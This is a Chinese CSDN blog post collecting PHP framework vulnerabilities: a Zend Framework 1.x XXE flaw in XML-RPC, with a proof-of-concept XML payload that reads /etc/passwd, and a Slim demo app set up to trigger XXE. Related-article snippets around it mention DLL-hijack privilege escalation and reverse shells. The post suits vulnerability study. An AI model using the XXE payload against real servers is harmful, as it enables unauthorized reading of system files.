zend及Slim 漏洞合集

最新推荐文章于 2022-08-29 16:29:30 发布
最新推荐文章于 2022-08-29 16:29:30 发布
阅读量691 收藏
点赞数
分类专栏: 框架漏洞 文章标签: php 框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/119800663
版权

zend漏洞

zend framework文件读取漏洞分析

Zend Framework 1.11.13、1.12.0之前版本内的(1) Zend_Dom, (2) Zend_Feed, (3) Zend_Soap没有正确处理SimpleXMLElement类,这使得远程攻击者可利用XML-RPC请求中DOCTYPE元素内的外部实体引用(external entity reference)注入攻击,从而读取任意文件或创建TCP连接。

poc:

<?xml version="1.0"?> 
<!DOCTYPE foo [   
  <!ELEMENT methodName ANY > 
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passswd" >]> 
<methodCall> 
  <methodName>&xxe;</methodName> 
</methodCall>

Zend Framework远程执行代码漏洞

poc的链接

Slim 漏洞

Slim XXE漏洞

编写一个最简单的demo页面,只有一个获取POST信息并输出的功能:

<?php
require 'vendor/autoload.php';
$app = new \Slim\App();
$app->post("/post", function($request, $response) {
    $parsedBody = $request->getParsedBody();
    print_r($parsedBody);
});
$app->run();

搭建在自己的服务器

正常请求

触发XXE漏洞并读取/etc/passwd:

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Zend架构最新漏洞修复程序,mg版本1.5-1.7适用
至善 至美
07-17 763
Index: lib/Zend/XmlRpc/Response.php =================================================================== --- lib/Zend/XmlRpc/Response.php (revision 157103) +++ lib/Zend/XmlRpc/Response.php (working cop
114.网络安全渗透测试—[权限提升篇12]—[Windows 2003 ZendDLL劫持提权&msf本地提权&msf持久后门]
qwsn
07-07 2238
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 在php里面有一个扩展是zend。 IIS6.0 在启动的时候或进程重启的时候,当有用户访问php网页,则会加载我们伪造的ZendExtensionManager.dll文件,该伪造的文件通过hack工具可以实现反弹Shell功能。 已经获得了靶机的一个webshell,且zend.dll是可读可写的。 (2)靶机链接: URL:第一步:【获取webshell过程略】,以下是提权过程:第二步
Zend Framework远程执行代码漏洞
小小猪的博客
11-12 891
Zend Framework远程执行代码漏洞 框架描述: Zend Framework (ZF)是Zend公司推出的一套PHP开发框架。是用 PHP 5 来开发 web程序和服务的开源框架。ZF 用 100% 面向对象编码实现。 ZF 的组件结构独一无二,每个组件几乎不依靠其他组件。这样的松耦合结构可以让开发者独立使用组件。 我们常称此为 “use-at-will”设计。 漏洞描述: Zend Framework远程执行代码漏洞源于Stream类的析构函数,这是一个PHP魔术方法。在面向对象编程中,
PHP常用框架漏洞
小小猪的博客
08-14 2903
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
SlimXXE漏洞
小小猪的博客
11-12 342
SlimXXE漏洞 漏洞详情: Slim cms下载地址 我们看到解析body的代码: Default public function __construct($method, UriInterface $uri, HeadersInterface $headers, array $cookies, array $serverParams, StreamInterface $body, array $uploadedFiles = []) { $this->originalMethod
php slim 教程,php框架slim架构上存在XXE漏洞(XXE的典型存在形式)
weixin_35149268的博客
03-10 392
现代cms框架(laraval/symfony/slim)的出现,导致现今的php漏洞出现点、原理、利用方法,发生了一些变化,这个系列希望可以总结一下自己挖掘的此类cms漏洞slim是一个设计思路超前的知名的php框架,完美结合了psr7来设计,至今用户已超过100w:在阅读其源码的过程中,我发现其存在一个只有在框架式CMS中才会出现的漏洞漏洞详情这个漏洞存在于最新版(3.0)中。首先用co...
zend studio 13.5.0 及13.5.1 注册机
07-31
Zend Studio 是专业开发人员在使用PHP整个开发周期中唯一的集成开发环境(IDE),它包括了PHP所有必须的开发部件。通过一整套编辑、调试、分析、优化和数据库工具,Zend Studio ... Zend Studio是Zend Technologies开发
Zend Guard使用指南及问题处理
10-24
主要介绍了Zend Guard使用指南及问题处理,需要的朋友可以参考下
zendstudio9.0.3破解及汉化
07-13
先把zend studio安装好; 然后把com zend php core 9 0 3 201205071416 jar放到plugins文件夹中(直接放到里面不要解压) 之后打开zend studio;填入上面的注册码 汉化: 选择Help菜单 >Install New Software ...
ZEND White Paper
最新发布
12-23
You agree that you are acquiring ZEND to participate in zkLend and to obtain services on the ecosystem thereon. The Company, the Distributor and their respective affiliates would develop and ...
zend framework中英文手册.rar
07-17
**Zend Framework 中英文手册** **一、Zend Framework 简介** Zend Framework 是一个开源的、基于组件的 PHP 框架,旨在提供高效的开发环境,以构建高质量的Web应用程序。它遵循MVC(Model-View-Controller)设计...
【MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 3638
任意文件读取漏洞分析
php zend引擎漏洞,PHP Zend引擎释放后重用堆破坏漏洞(CVE-2010-4697)
weixin_39797393的博客
04-08 164
发布日期:2010-12-08更新日期:2012-04-12受影响系统:PHP PHP 5.3.xPHP PHP 5.2.x不受影响系统:PHP PHP 5.3.4PHP PHP 5.2.15描述:--------------------------------------------------------------------------------BUGTRAQ ID: 45952CVE...
zend framework xxe injection 的分析
cnbird's blog
07-13 991
前几天网上爆出一个zend framework 漏洞 作者:mkods 具体描述如下: https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt ; 根据描述,该漏洞是发生在zend 框架 xmlrpc模块的一个 xxe(XML external entity) injection漏洞,利用这个
Zend Framework XML外部实体和安全绕过漏洞
weixin_30681121的博客
03-27 144
漏洞版本: Zend Framework 1.x 漏洞描述: Bugtraq ID:66358 Zend Framework是一款开放源代码的PHP5开发框架实现。 Zend Framework存在多个安全漏洞: 1,处理XML实体时存在错误,允许攻击者通过特制的包含外部实体引用的XML文档来获取本地文件内容或消耗服务器资源。 2,ZendOpenId和Zend_...
服务器系统及软件常见漏洞
runfeel
07-10 1895
最近由有一个什么事情,大家都懂。上头发了个加密传真,要求加强网络安全检查,于是乎所有服务器进行了大扫描,现整理一些常见漏洞... 漏洞名称 允许Traceroute探测 远端WWW服务支持TRACE请求 远端WWW服务提供了对WebDAV的支持 远端WEB服务器上存在/robots.txt文件 远端VNC服务正在运行 远端HTTP服务器类型和...
Magento新的ZEND FRAMEWORK安全漏洞
Pedrito666的博客
10-12 296
Magento原厂近日发布了一个与Zend Framework 1和2的Email元件相关的安全性漏洞。包括Magento 1.x和Magento 2.x在内的许多PHP解决方案都使用了这个元件。如果您的服务器使用Sendmail作为邮件传输代理的话,这个严重的漏洞可导致恶意的黑客使用远端代码执行攻击。 要保护您的网站免受此漏洞的影响,您应该立即检查邮件发送设定。请到您的Magento商店后台修...
方卡在线php程序漏洞,php zend framework 的一些功能说明
weixin_30430677的博客
03-13 211
现在的zf最新版本是ZendFramework-1.12(现在最新的已经到2了),下载后重新对里面的功能做了一些简单的分析,希望和大家一起学习进步.1)tests文件夹里面对我们怎样使用zend framework内核提供了很好的例子,也给出了如何测试zf的方法2)demos里面提供了实际的功能例子,对我们的实际开发有很好的参考作用3)dojo是非常适合放到后台管理使用,但功能太强大,学习起来比较...
zendframework官方入门手册[收集].pdf
10-12
安装完Zend框架后,您可以在特定路径下找到框架文件,如Mac OSX和Linux的/usr/local/Zend/或Windows上的C:\Program Files\ZendFramework。安装框架后,您需要配置include_path以便能够访问Zend框架的文件。您还可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值